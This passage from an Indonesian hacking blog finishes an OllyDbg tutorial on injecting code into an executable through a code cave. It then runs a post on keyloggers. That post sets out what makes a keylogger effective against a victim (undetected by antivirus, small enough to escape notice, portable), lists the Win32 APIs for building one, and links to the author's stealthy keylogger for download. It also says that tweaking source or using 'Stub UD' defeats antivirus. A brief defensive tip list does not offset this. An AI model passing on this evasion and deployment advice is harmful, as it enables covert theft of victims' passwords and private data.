bukan sebagai ASCII oleh Ollydbg, untuk merapikannya cukup klik kanan pilih Analysis->Analyze code<br />
(Anda juga bisa mempergunakan CTRL+A atau dengan menggunakan bantuan Plugin “Analyze this!”<br />
untuk mempercepat kerja Anda). Jika berjalan lancar, karakter Anda akan terlihat sebagai ASCII.</div><div style="text-align: justify;"><img alt="" class="alignnone" height="270" src="http://farm6.static.flickr.com/5223/5621229819_fb623ef0c7_d.jpg" title="Caption" width="500" /><br />
<strong> Gambar 4. Caption Text</strong></div><div style="text-align: justify;"><img alt="" class="alignnone" height="228" src="http://farm6.static.flickr.com/5104/5621817314_da0e39b6f7_d.jpg" title="Caption text" width="500" /><br />
<strong> Gambar 5. Analyze</strong></div><div style="text-align: justify;"><img alt="" class="alignnone" height="107" src="http://farm6.static.flickr.com/5062/5621817352_9e4522b668_d.jpg" title="ASCII Char" width="443" /><br />
<strong> Gambar 6. ASCII Character</strong></div><div style="text-align: justify;"><strong>Step 5 :</strong><br />
Untuk membuat Message Content atau isi pesan, caranya sama dengan Step 4. Misal isi pesan tersebut<br />
“THIS IS MY STUPID CODE” tanpa tanda petik.</div><div style="text-align: justify;"><img alt="" class="alignnone" height="266" src="http://farm6.static.flickr.com/5102/5621817420_e4b2402e62_d.jpg" title="Message content" width="500" /><br />
<strong> Gambar 7. Message Content</strong></div><div style="text-align: justify;"><strong>Step 6 :</strong><br />
Sekarang saatnya sedikit bermain dengan bahasa Assembly.. Tenang, Saya tidak akan membahas bahasa<br />
pemrograman yang rumit. Berpikir rumit hanya akan membuat diri kita cepat tua dan membuat kepala<br />
botak.. (sudah pakai kacamata, botak pula, apa kata dunia??? <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> )</div><div style="text-align: justify;">Disini kita akan menyisipkan sebuah message box (dialog pesan) dengan menggunakan bahasa<br />
Assembly. Ingat, ini adalah metode Reverse Engineering dengan menggunakan Ollydbg jadi hanya ada 2<br />
pilihan pakai bahasa assembly atau hexa, apakah tidak ada yang lebih mudah?</div><div style="text-align: justify;">Jawabannya ada.. yaitu matikan komputer, hidupkan MP3 Player lalu tidur:)</div><div style="text-align: justify;"><strong>MessageBox (Win32 Programmer’s Reference)</strong></div><div style="text-align: justify;">Fungsi MessageBox menciptakan, menampilkan dan mengoperasikan sebuah dialog pesan. Dialog pesan<br />
berisi suatu gambaran-aplikasi pesan dan judul, ditambah berbagai kombinasi dari tombol tekan dan<br />
ikon yang dikenal.</div><div style="text-align: justify;"><span style="color: #888888;">Info</span><br />
<span style="color: #888888;"> Windows NT : Yes</span><br />
<span style="color: #888888;"> Win95 : Yes</span><br />
<span style="color: #888888;"> Win32s : Yes</span><br />
<span style="color: #888888;"> Import Library : user32.lib</span><br />
<span style="color: #888888;"> Header File : winuser.h</span><br />
<span style="color: #888888;"> Unicode : WinNT; Win95</span><br />
<span style="color: #888888;"> Platform Notes : None</span></div><div style="text-align: justify;"><span style="color: #888888;">Syntax</span><br />
<span style="color: #888888;"> int MessageBox(</span><br />
<span style="color: #888888;"> HWND hWnd, // handle of owner window</span><br />
<span style="color: #888888;"> LPCTSTR lpText, // address of text in message box</span><br />
<span style="color: #888888;"> LPCTSTR lpCaption, // address of title of message box</span><br />
<span style="color: #888888;"> UINT uType // style of message box</span><br />
<span style="color: #888888;"> );</span></div><div style="text-align: justify;">Untuk menyisipkan kode Assembly, klik kanan pilih “Assemble” atau tekan tombol Space pada keyboard<br />
Anda. Pada kolom yang tersedia ketikkan perintah yang ingin Anda sisipkan pada kolom Disassembly,<br />
misal :</div><div style="text-align: justify;"><img alt="" class="alignnone" height="138" src="http://farm6.static.flickr.com/5024/5621228327_70351f694e_d.jpg" title="Assembly Code Injection" width="500" /><br />
<strong> Assembly Code Injection</strong></div><div style="text-align: justify;"><strong>CATATAN</strong>, Address pada setiap komputer tidak sama. Jadi sesuaikan dengan Address yang terdapat<br />
pada komputer Anda bukan Address pada artikel ini. Address pada Ollydbg terletak pada kolom sebelah<br />
kiri. Selalu perhatikan dan catat Address yang dipergunakan pada setiap Step artikel ini.</div><div style="text-align: justify;"><img alt="" class="alignnone" height="295" src="http://farm6.static.flickr.com/5190/5621230123_548ac44652_d.jpg" title="Assembly" width="475" /><br />
<strong> Gambar 8. Assemble</strong></div><div style="text-align: justify;"><img alt="" class="alignnone" height="333" src="http://farm6.static.flickr.com/5029/5621230249_3bd5d402ac_d.jpg" title="Injeksi code assembly" width="500" /><br />
<strong> Gambar 9. Injeksi kode Assembly</strong></div><div style="text-align: justify;"><strong>Step 7 :</strong><br />
Setelah itu saatnya menuju Program Origin, karena tanpa hal itu kode yang Anda sisipkan tidak akan<br />
berjalan. Klik kanan pilih Go to->Origin</div><div style="text-align: justify;"><img alt="" class="alignnone" height="216" src="http://farm6.static.flickr.com/5029/5621228509_ec390495f8_d.jpg" title="Goto Original" width="500" /><br />
<strong> Gambar 10. Go to Origin</strong></div><div style="text-align: justify;">Saya sarankan Anda mencatat Address, Disassembly dan Hex dump pada Program Origin karena nanti<br />
akan dipergunakan sebagai acuan lompatan Address.</div><div style="text-align: justify;">Blok dengan menggunakan cursor mouse 2 Address tersebut, klik kanan pilih Binary->Binary copy</div><div style="text-align: justify;"><img alt="" class="alignnone" height="127" src="http://farm6.static.flickr.com/5027/5621228639_9c28ea4cf9_d.jpg" title="Binary Copy" width="500" /><br />
<strong> Gambar 11. Binary Copy</strong></div><div style="text-align: justify;">Paste kode binary tersebut pada Code Cave yang masih belum dipergunakan, blok area Code Cave<br />
sesuai dengan bytes yang dibutuhkan dengan cursor mouse, klik kanan pilih Binary->Binary paste</div><div style="text-align: justify;"><img alt="" class="alignnone" height="217" src="http://farm6.static.flickr.com/5145/5621228939_04282b9ced_d.jpg" title="Binary paste" width="500" /><br />
<strong> Gambar 12. Binary Paste</strong></div><div style="text-align: justify;"><strong>Step 8 :</strong><br />
Langkah berikutnya adalah mengubah perintah program agar program memanggil kode yang disisipkan.</div><div style="text-align: justify;">Pada address 00401019 rubahlah “call 00401BA0″ menjadi “jmp 00401019″. Address 00401019<br />
diperoleh dari Program Origin.</div><div style="text-align: justify;"><img alt="" class="alignnone" height="123" src="http://farm6.static.flickr.com/5141/5621816510_23dea0976d_d.jpg" title="Merubah Instruksi" width="500" /><br />
<strong> Gambar 13. Merubah Instruksi pada Code Cave</strong></div><div style="text-align: justify;">Tahap selanjutnya adalah kembali menuju Program Origin seperti pada Step 7, pada address 00401014<br />
rubahlah “push 00401749″ menjadi “jmp 00404A91″.</div><div style="text-align: justify;"><img alt="" class="alignnone" height="116" src="http://farm6.static.flickr.com/5022/5621229245_128e56ab22_d.jpg" title="Merubah Instruksi" width="500" /><br />
<strong> Gambar 14. Merubah instruksi pada Program Origin</strong></div><div style="text-align: justify;"><img alt="" class="alignnone" height="196" src="http://farm6.static.flickr.com/5105/5621816714_b0c5d47d89_d.jpg" title="Kode Lengkap" width="500" /><br />
<strong> Gambar 15. Kode Hacked</strong></div><div style="text-align: justify;">Proses injeksi sudah lengkap, sekarang simpan program yang telah disisipi kode injeksi tersebut dengan<br />
cara klik kanan pilih Copy to executable->All modifications->Copy all->klik kanan->Save file.</div><div style="text-align: justify;"><img alt="" class="alignnone" height="300" src="http://farm6.static.flickr.com/5063/5621229393_a2c0726950_d.jpg" title="Kode Hacked" width="410" /><br />
<strong> Gambar 16. Preview</strong></div><div style="text-align: justify;">Selanjutnya silahkan jalankan file tersebut, jika semua instruksi sudah benar, Anda akan menjumpai<br />
sebuah message box (dialog pesan) di awal program dijalankan. Jika tidak bisa, teliti dari awal karena<br />
mungkin terdapat kesalahan pengkodean. Jika masih tidak bisa, sepertinya Anda tidak hoki mendalami<br />
bidang ilmu komputer. Bagaimana jika menekuni dunia peternakan saja seperti Saya???</div><div style="text-align: justify;"><strong>Final notes :</strong></div><div style="text-align: justify;">Proses injeksi executable bisa Anda kembangkan dengan menggunakan syntax dan metode yang lain,<br />
metode ini juga bisa Anda pergunakan untuk jenis executable lain yang terdapat di komputer Anda,<br />
bahkan untuk executable yang sudah di pack. Misal menggunakan metode Memory Address dan lain<br />
sebagainya.</div><div style="text-align: justify;">Setelah membaca artikel ini, bagi Anda yang sering melakukan aktifitas download software terutama di<br />
situs penyedia software bajakan (Cracked Software), ada baiknya Anda melakukan verifikasi integritas<br />
file dengan menggunakan CRC32, MD5 atau file SFV. Hal tersebut bisa membantu Anda mengetahui<br />
keaslian software yang Anda download, apakah sudah ada yang memanipulasinya atau original. Karena<br />
Antivirus sampai saat ini belum bisa diandalkan mengidentifikasi hal tersebut kecuali untuk bundled file.</div><div style="text-align: justify;">Untuk menghindari penyalahgunaan dalam hal kejahatan cyber (Contoh: Exploit, Shellcode, Trojan, dan<br />
lainnya) baik oleh lamer, scriptkiddies dan pihak lain yang tidak bertanggungjawab (kecuali 733t..:) ),<br />
Saya sengaja meletakkan “Software Bug (Cacat Program)” yang artinya file target “Target.exe” (ataupun<br />
file lain yang Anda jadikan sebagai target) bisa dijalankan ratusan kali bahkan lebih dengan<br />
menggunakan metode ini namun akan rusak secara otomatis dan tidak dapat dijalankan lagi setelah<br />
komputer Anda direstart. Jadi Anda harus mengulangi lagi setiap tahapan dari awal Semoga artikel ini<br />
bisa memberi manfaat bagi Anda dan membantu Anda menjaga diri Anda dari kejahatan cyber. Terima<br />
kasih.</div><div style="text-align: justify;"><a href="http://adf.ly/313683/http://www.mrhpx.astalavista.ms/kode733t3by/dlmrhpxdl/download.php?file=www.mrhpx.co.nr-executable-injection-tutorial-part1-messagebox.rar"><strong>Download link klik disini</strong></a></div><div style="text-align: justify;"><strong>MRHPx regards and messages :</strong></div><ul style="text-align: justify;"><li>My family for love, peace and emphaty.. Allah SWT and Muhammad SAW for life, light and everything..</li>
</ul><ul style="text-align: justify;"><li> Reverse Code Engineering scene, Astalavista.MS, Blackhat Community, Indonesia veteran hAxx0r (You know who you are.. <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> )</li>
</ul><ul style="text-align: justify;"><li> Source code semua program atau hack tool (EXCEPT PRIVATE-SECRET TOOLS!) dari seluruh artikel dan rilis NeMeSiS_ByTe dan MRHPx bisa diperoleh dengan cara kontak melalui email baru Saya di atas.. Ehm, sori ganti Nickname sejak 2008 tidak lagi sebagai NeMeSiS_ByTe <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> Juga ganti email, ganti website, ganti peruntungan! <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> Long live reverser..!</li>
</ul><div style="text-align: justify;"><strong>PENTING :</strong></div><ul style="text-align: justify;"><li> Jika Anda request software atau tool yang tidak terdapat di website Saya atau sulit didapatkan (baik software gratis atau berbayar), harap mengganti biaya bandwith internet (Download Broadband) dan biaya pengiriman (CD Distribusi Pos). Harap maklum, Saya bukan milyuner yang mempunyai banyak uang, Saya tidak mungkin membiayai setiap request software dan tool yang Anda butuhkan.</li>
</ul><ul style="text-align: justify;"><li> Untuk keperluan apapun harap menghubungi Saya melalui email Yahoo atau Facebook, karena nomer telpon Saya hanya untuk keperluan bisnis dan pekerjaan. Bukan dipergunakan untuk CHAT dan tanya jawab.</li>
</ul><strong>Oleh : MRHPx aka NeMeSiS_ByTe aka RiZaL</strong><br />
<strong> (Pasuruan-Malang, Pebruari 2011)</strong><br />
<strong>Email :</strong> <a href="mailto:mrhpx@binushacker.org" title="mrhpx@binushacker.org">mrhpx@binushacker.org</a><br />
<strong>Facebook : </strong><a href="http://www.facebook.com/MRHPx" title="www.facebook.com/MRHPx">www.facebook.com/MRHPx</a> (Menghindari scam, kirim pesan dulu, baru di add)<br />
<strong>Informasi Tutorial Bila Ada Update: <a href="http://mrhpx.byethost10.com/reverse-engineering/executable-injection-tutorial-part-1-messagebox/"><span style="color: blue;">Disini</span></a></strong><br />
<strong>Mirror: </strong><a href="http://www.mrhpx.co.nr/" title="www.mrhpx.co.nr">www.mrhpx.co.nr</a></div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-72615316448053454812011-05-23T03:36:00.000+07:002011-05-23T03:36:09.707+07:00Key Logger: Tool Pencuri Informasi<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
<div style="text-align: justify;"><strong>Written By : MRHPx aka Rizal (Formerly NeMeSiS_ByTe)</strong><br />
<strong> Written On : May 2o11, Between Pasuruan-Malang, Indonesia</strong><br />
<strong> Level : Beginner</strong></div><div style="text-align: justify;"><br />
</div><img alt="Binus Hacker Keylogger" src="http://farm4.static.flickr.com/3175/5706952104_4d90fddca1_m_d.jpg" /><br />
<div style="text-align: justify;"><strong>HACKINTRO</strong><br />
Artikel ini Saya tulis untuk memenuhi permintaan rekan-rekan melalui email yang penasaran terhadap tool yang disebut Key Logger. Kebetulan hari ini Saya sedang cuti kerja beberapa hari, jadi Saya mempunyai banyak waktu untuk membuka beberapa arsip lama Hack Tool yang tersimpan di server pribadi Saya. Untung semua source code masih tersimpan dengan baik, jadi Saya tidak perlu menulis ulang kode-kode konyol ini. Saya lebih menyukai mempergunakan jari tangan Saya untuk bermain gitar dan membedah hewan. Jari yang keriting terlalu banyak coding tidak mungkin di-rebonding <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> </div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><strong>KEY LOGGER (KEYSTROKE LOGGER) DEFINITION</strong><br />
Adalah suatu program yang berjalan di belakang sistem (Background), merekam semua tombol. Sekali Key Logger dijalankan, maka otomatis akan bersembunyi di dalam mesin untuk mencatat semua data atau mengirimkan datanya secara langsung ke pemilik Key Logger.</div><div style="text-align: justify;">Pemilik Key Logger kemudian membaca data yang didapatkan tersebut dengan teliti dengan harapan menemukan kata sandi (Password) atau mungkin informasi lain yang bermanfaat yang bisa digunakan sebagai serangan Social Engineering. Key Logger secara sederhana bisa dikategorikan sebagai Hack Tool Pencuri Informasi. Sebagai contoh, Key Logger dapat mengungkapkan isi dari semua e-mail yang ditulis oleh korban. Program Key Logger biasanya terdapat di dalam rootkit dan trojan.</div><div style="text-align: justify;">Key Logger berfungsi untuk merekam (mencatat) semua aktifitas pengguna komputer dengan mengambil input data melalui karakter keyboard yang digunakan oleh user. Jadi jika user mengetikkan kata <em>“SaYa”</em> melalui keyboard maka secara otomatis Key Logger akan mencatatnya pada sebuah LOG file dengan data <em>“SaYa”</em>.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><strong>HACK TOOL = UTILITIES = KEY LOGGER?</strong><br />
Jika ada pertanyaan, apakah Key Logger itu termasuk tool jahat? atau sejenis software utilities yang baik? Terus terang hanya Anda yang bisa menjawabnya. Kelebihan manusia dengan makhluk lain adalah mampu membedakan mana hal yang baik dan mana hal yang tidak baik.</div><div style="text-align: justify;"><strong>A) Angel Style..?</strong><br />
Key Logger sering dipergunakan sebagai <em>parental advisory</em> (kontrol orang tua) untuk mengawasi kegiatan anak-anak mereka saat mempergunakan komputer. Selain itu juga sering dipergunakan oleh pemilik <em>internet cafe</em> (warnet), <em>network sharing</em>, dan lainnya untuk mengawasi aktifitas user. Contoh : Pembatas konten dewasa <em>(pr0n)</em>, kontrol orang tua terhadap topik pembicaraan anak di internet, etc.</div><div style="text-align: justify;"><strong>B) Evil Style..?</strong><br />
Di sisi lain Key Logger jika disalahgunakan akan sangat merugikan sekali, terutama bagi user yang menjadi target penyalahgunaan tool Key Logger. Semua karakter yang diketikkan melalui keyboard akan tercatat dengan baik pada LOG file. Entah itu password, Username, nomer PIN bank, account FTP/Facebook/etc. Dari sini Anda tentu bisa membayangkan apa yang akan terjadi jika Anda dan komputer Anda menjadi target kejahatan ini.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><strong>TIPS TO PICK BEST STUFF</strong><br />
Key Logger bisa dikategorikan cukup baik dan mampu diandalkan jika memenuhi beberapa kriteria sebagai berikut :</div><div style="text-align: justify;"><strong>A) Keberadaannya TIDAK TERDETEKSI oleh Antivirus, Anti-Malware dan lainnya,</strong><br />
Anda boleh saja bangga mempunyai Key Logger canggih dan keren, Anda boleh saja menghabiskan uang tabungan Anda untuk membeli software Key Logger yang banyak tersedia di internet. Fakta yang ada adalah 99% Key Logger yang terdapat di internet sudah teridentifikasi oleh Antivirus. Key Logger berharga mahal dan terkenal sekalipun jika sudah terdeteksi oleh Antivirus apa bisa dipergunakan???</div><div style="text-align: justify;"><strong>B) Memiliki ukuran (Size) yang relatif KECIL < 50 KB,</strong><br />
Size DOES Matter, ukuran itu penting. Key Logger dengan size besar >50KB (seperti monster Godzilla Size DOESN’T Matter) akan menimbulkan kecurigaan di komputer korban. Selain itu proses dan loadingnya sudah pasti lebih lama. Hal ini tidaklah efektif.</div><div style="text-align: justify;"><strong>C) PORTABLE dan KETERGANTUNGAN resource (dependency),</strong><br />
Key Logger harus bisa disalin dan dijalankan pada komputer berbeda tanpa memerlukan installasi yang rumit dan minimum requirement yang berbelit-belit. Sebagai contoh : Program yang ditulis dengan menggunakan <em>MS Visual Basic</em> sebagian besar bergantung pada <em>MSVBVM.DLL</em>, jika pada komputer korban tidak terdapat <em>MSVBVM.DLL</em> maka Key Logger tidak akan dapat dijalankan!!!</div><div style="text-align: justify;">Apa ya solusi yang tepat? Oya, bagaimana jika meminta korban untuk mendownload file <em>MSVBVM.DLL</em> serta menjelaskan kepada korban bahwa di komputernya terdapat Key Logger milik Anda yang tidak akan bisa dijalankan tanpa mendownload file tersebut? Solusi GILA tersebut tentu akan membuat mata Anda lebam 3 hari 3 malam karena terkena tendangan maut dari korban yang tidak terima komputernya disusupi oleh Key Logger Anda.</div><div style="text-align: justify;">Bagaimana dengan solusi attachment? Solusi menyisipkan <em>MSVBVM.DLL</em> di dalam Key Logger juga adalah sebuah solusi yang GILA karena akan mengakibatkan size Key Logger bertambah besar! Solusi yang tepat adalah kode optimisasi atau pergunakan bahasa pemrograman yang fleksibel, misal Assembly.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><strong>SOME USEFUL APIS</strong><br />
Berikut ini Saya lampirkan Referensi Programmer untuk Microsoft Win32 mengenai beberapa fungsi API utama yang sering dipergunakan dalam pemrograman Key Logger :</div><div style="text-align: justify;"><strong>Hooks (Referensi user32.dll)</strong><br />
Hook adalah suatu point dalam mekanisme penanganan-pesan Microsoft® Windows® di mana sebuah aplikasi dapat menginstal suatu subroutine untuk memonitor lalu-lintas pesan di dalam sistem dan memproses jenis tertentu dari pesan-pesan sebelum menjangkau prosedur jendela target. Untuk mempelajari lebih lanjut, silahkan Anda membaca artikel Saya yang berjudul <a href="http://www.binushacker.net/menembus-proteksi-password-dan-serial-number.html" target="_blank" title="Link to Website and Article"><span style="color: #3366ff;"><strong><em>“Menembus proteksi Password dan Serial Number pada program dengan trik Win32 Hook”</em></strong></span></a></div><div style="text-align: justify;"><strong>RegisterHotKey (Referensi user32.dll)</strong><br />
Fungsi RegisterHotKey menggambarkan suatu kunci untuk menyisipkan thread.<br />
<span style="color: #3366ff;">BOOL RegisterHotKey(</span><br />
<span style="color: #3366ff;"> HWND hWnd, // window to receive hot-key notification</span><br />
<span style="color: #3366ff;"> int id, // identifier of hot key</span><br />
<span style="color: #3366ff;"> UINT fsModifiers, // key-modifier flags</span><br />
<span style="color: #3366ff;"> UINT vk // virtual-key code</span><br />
<span style="color: #3366ff;"> );</span></div><div style="text-align: justify;"><strong>GetMessage (Referensi user32.dll)</strong><br />
Fungsi GetMessage mengambil kembali sebuah pesan dari antrian thread pemanggilan pesan dan menempatkannya di struktur yang ditetapkan. Fungsi Ini dapat mengambil kembali kedua pesan yang berhubungan dengan jendela yang ditetapkan dan thread mengeposkan pesan-pesan melalui fungsi PostThreadMessage. Fungsi mengambil kembali pesan-pesan yang berada di dalam cakupan yang ditetapkan dari nilai pesan. GetMessage tidak mengambil kembali pesan untuk jendela yang dimiliki oleh thread atau aplikasi lain.<br />
<span style="color: #3366ff;">BOOL GetMessage(</span><br />
<span style="color: #3366ff;"> LPMSG lpMsg, // address of structure with message</span><br />
<span style="color: #3366ff;"> HWND hWnd, // handle of window</span><br />
<span style="color: #3366ff;"> UINT wMsgFilterMin, // first message</span><br />
<span style="color: #3366ff;"> UINT wMsgFilterMax // last message</span><br />
<span style="color: #3366ff;"> );</span></div><div style="text-align: justify;"><strong>GetKeyboardState (Referensi user32.dll)</strong><br />
Fungsi GetKeyboardState menyalin status 256 tombol virtual ke buffer yang ditetapkan.<br />
<span style="color: #3366ff;">BOOL GetKeyboardState(</span><br />
<span style="color: #3366ff;"> PBYTE lpKeyState // address of array to receive status data</span><br />
<span style="color: #3366ff;"> );</span></div><div style="text-align: justify;"><strong>GetKeyNameText (Referensi user32.dll)</strong><br />
Fungsi GetKeyNameText mengambil kembali sebuah string yang menampilkan nama dari sebuah key.<br />
<span style="color: #3366ff;">int GetKeyNameText(</span><br />
<span style="color: #3366ff;"> LONG lParam, // second parameter of keyboard message</span><br />
<span style="color: #3366ff;"> LPTSTR lpString, // address of buffer for key name</span><br />
<span style="color: #3366ff;"> int nSize // maximum length of key-name string length</span><br />
<span style="color: #3366ff;"> );</span></div><div style="text-align: justify;"><strong>GetKeyState (Referensi user32.dll)</strong><br />
Fungsi GetKeyState mengambil kembali status dari kunci virtual yang ditetapkan. Status tersebut menetapkan apakah kunci up, down, atau toggle (on, off ¾ bertukar-tukar setiap kali kunci ditekan).<br />
<span style="color: #3366ff;">SHORT GetKeyState(</span><br />
<span style="color: #3366ff;"> int nVirtKey // virtual-key code</span><br />
<span style="color: #3366ff;"> );</span></div><div style="text-align: justify;"><strong>GetAsyncKeyState (Referensi user32.dll)</strong><br />
Fungsi GetAsyncKeyState menentukan apakah suatu kunci up atau down pada saat fungsi dipanggil, dan apakah kunci ditekan setelah pemanggilan sebelumnya ke GetAsyncKeyState.<br />
<span style="color: #3366ff;">SHORT GetAsyncKeyState(</span><br />
<span style="color: #3366ff;"> int vKey // virtual-key code</span><br />
<span style="color: #3366ff;"> );</span></div><div style="text-align: justify;"><span style="color: #3366ff;"><br />
</span></div><div style="text-align: justify;"><strong>PROOF OF CONCEPT</strong><br />
<em>MRHPx Key Logger v1.8 (PUBLIC VERSION)</em> mungkin adalah Key Logger terkecil di dunia, dengan size hanya sebesar 10.5 KB (10,752 bytes) tanpa kompresi! <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> Untuk mendapatkannya Anda bisa mendowloadnya di website Saya. Jalankan file <em>“MRHPx-Key-Logger.exe”</em> dengan cara klik ganda dengan mouse. Key Logger akan menciptakan LOG file dengan nama <em>“MRHPx-KeyLogger-v1.8-PUBLICVERSION-Log.txt”</em> pada lokasi direktori yang sama dengan tempat executable berada.</div><div style="text-align: justify;"><br />
</div><img alt="Binus Hacker Keylogger" src="http://farm4.static.flickr.com/3456/5706952218_529ab998bd.jpg" /><br />
<div style="text-align: justify;"><strong>Screenshot 1. Applications Tab Task Manager</strong></div><div style="text-align: justify;"><strong><br />
</strong></div><div style="text-align: justify;">Saya menggunakan bahasa pemrograman Assembly 32 bit (bukan Assembly 16 bit yang sudah ketinggalan jaman) untuk coding Key Logger ini. Assembly 32 bit setara dengan C/C++, Delphi, VB, kelebihan lainnya adalah lebih cepat. Ingat, Key Logger ini tidak terlihat pada Applications Tab Task Manager, tidak memiliki GUI (User Interface) apalagi sampai warna-warni seperti bendera partai pada saat pemilu. Konsep Saya adalah membuat Key Logger dengan resource minimalis tapi powerful bak <em>PANAH DEWA</em> seperti rootkit <em>SWISS ARMY KNIFE</em> lainnya yang berjalan secara background..</div><br />
<img alt="Keylogger" src="http://farm3.static.flickr.com/2009/5706952382_e31da86dcf.jpg" /><br />
<div style="text-align: justify;"><strong>Screenshot 2. LOG file</strong></div><div style="text-align: justify;"><strong><br />
</strong></div><div style="text-align: justify;">Selanjutnya silahkan Anda mengetik apapun dengan menggunakan keyboard hardware ataupun virtual keyboard. Aplikasi apapun yang Anda pergunakan untuk mengetik data akan tersimpan dengan baik pada LOG file secara terpisah. LOG file akan menyimpan data secara berkala setiap kali aplikasi baru dijalankan. Untuk membaca LOG file Anda tidak perlu keluar dari aplikasi karena Saya tidak men-setting batasan hak akses file user. Bagi Anda yang ingin mengetahui lebih lanjut beberapa fitur yang lain silahkan Anda membaca file <em>“BACA_AKU.txt”</em> yang disertakan. Untuk keluar dari aplikasi Key Logger silahkan tekan secara bersamaan tombol <em>“CTRL+ALT+P”</em> pada Keyboard Anda.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><strong>FINAL NOTES</strong><br />
Key Logger sangat berbahaya jika dipergunakan sebagai alat kejahatan. Sepintas memang terlihat sepele, karena pada umumnya data yang tersimpan di dalam LOG file cukup acak (CATATAN: beberapa Shareware Key Logger di internet memiliki LOG file yang sangat amburadul karena dibuat secara asal oleh coder BEGO dan MATRE). Namun apa yang terjadi jika data LOG file tersebut dipergunakan sebagai <em>Dictionary Bruteforce</em> dengan bantuan tool seperti <em>John the Ripper</em> dan lainnya??? Untuk memperoleh informasi username dan password korban, data yang semula acak dan sepele akan menjadi dictionary efektif dan bisa dipergunakan sebagai akses login hanya dalam hitungan menit.</div><div style="text-align: justify;">Contoh lain adalah jika Anda seorang guru atau dosen dan memiliki siswa yang ternyata seorang hacker (Maksud Saya Cracker), bukan tidak mungkin siswa Anda akan selalu mendapatkan nilai terbaik pada saat ujian karena siswa Anda memasang Key Logger di laptop yang Anda pergunakan untuk menyusun naskah ujian. Tanpa perlu belajar keras, cukup membaca naskah ujian yang telah dicuri oleh Key Logger, siswa Anda akan terlihat menyamai kepintaran Bapak Habibie dalam mengerjakan ujian keesokan harinya <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> </div><div style="text-align: justify;">Mengerikan bukan? Namun jangan kuatir karena ada cara sederhana dan efektif untuk mencegah komputer Anda disusupi oleh Key Logger yaitu dengan mengaktifkan User Account Control (UAC), memeriksa Registry Autorun dan Service Startup Windows serta memeriksa aplikasi yang berjalan secara background dan terlihat mencurigakan di komputer Anda.</div><div style="text-align: justify;">Untuk metode lain, seperti heuristic detection antivirus, firewall dan sebagainya, sepengetahuan Saya hal tersebut kurang efektif. Karena hacker tidak memerlukan waktu yang lama mensiasati deteksi Antivirus yang hampir selalu berdasarkan pada algoritma signature (TradeMark virus). Hanya dengan merubah beberapa baris kode yang terdapat pada source code, maka Hack Tool tidak akan terdeteksi lagi oleh Antivirus. Efektifitas signature yang terdapat dalam database antivirus hanyalah untuk Hack Tool yang dirilis secara PUBLIC VERSION bukan PRIVATE VERSION. Metode lain sebagai alternatif yang cepat dan mudah yang sering dipilih oleh hacker untuk melewati deteksi Antivirus yaitu dengan menggunakan <em>Stub UD</em> atau <em>Stub Commercial Protector</em>. Semoga artikel ini bermanfaat dan dapat membantu Anda mengamankan diri dari kejahatan cyber. <em>NB : untuk orang-orang gak tahu malu, gak ada keinginan belajar, sukanya gratisan, pengennya langsung pakai, yang hobi request crack, hack tool, cheat game online, hack facebook, hack website dan lainnya melalui email Saya, kalian gak ada kerjaan lain apa??? Kenapa gak sekalian aja minta nomer PIN BCA, Account Paypal, Credit Card, tunjangan sosial dan uang di dompet Saya???</em></div><div style="text-align: justify;"><em><br />
</em></div><strong><a href="http://adf.ly/313683/http://www.mrhpx.astalavista.ms/kode733t3by/dlmrhpxdl/download.php?file=www.mrhpx.co.nr-mrhpx-keylogger-v1.8-public.rar" target="_blank" title="DOWNLOAD GRATISSSSS!"><img alt="Download Keylogger" src="http://www.binushacker.net/wp-content/uploads/downloads.gif" /></a></strong><br />
<div style="text-align: justify;"><strong>CONTACT ADDRESS</strong><br />
<strong>Website :</strong> <a href="http://www.mrhpx.co.nr/" title="www.mrhpx.co.nr"><span style="color: #3366ff;">www.mrhpx.co.nr</span></a><br />
<strong>Mirror :</strong> <a href="http://www.mrhpx.astalavista.ms/" title="www.mrhpx.astalavista.ms"><span style="color: #3366ff;">www.mrhpx.astalavista.ms</span></a><br />
<strong>Email :</strong> <span style="color: #3366ff;">mrhpx</span>[<span style="color: #3366ff;">@</span>]<span style="color: #3366ff;">yahoo.com</span> / <span style="color: #3366ff;">nemesisbyte</span>[<span style="color: #3366ff;">@</span>]<span style="color: #3366ff;">yahoo.com</span> / <span style="color: #3366ff;">mrhpx</span>[<span style="color: #3366ff;">@</span>]<span style="color: #3366ff;">binushacker.org</span><br />
<strong>Facebook :</strong> <a href="http://www.facebook.com/mrhpx" target="_blank" title="www.facebook.com/mrhpx"><span style="color: #3366ff;">www.facebook.com/mrhpx</span></a> (Kirim pesan dulu baru Add, menghindari SPAMMERS!)</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><strong>THANX TO :</strong><br />
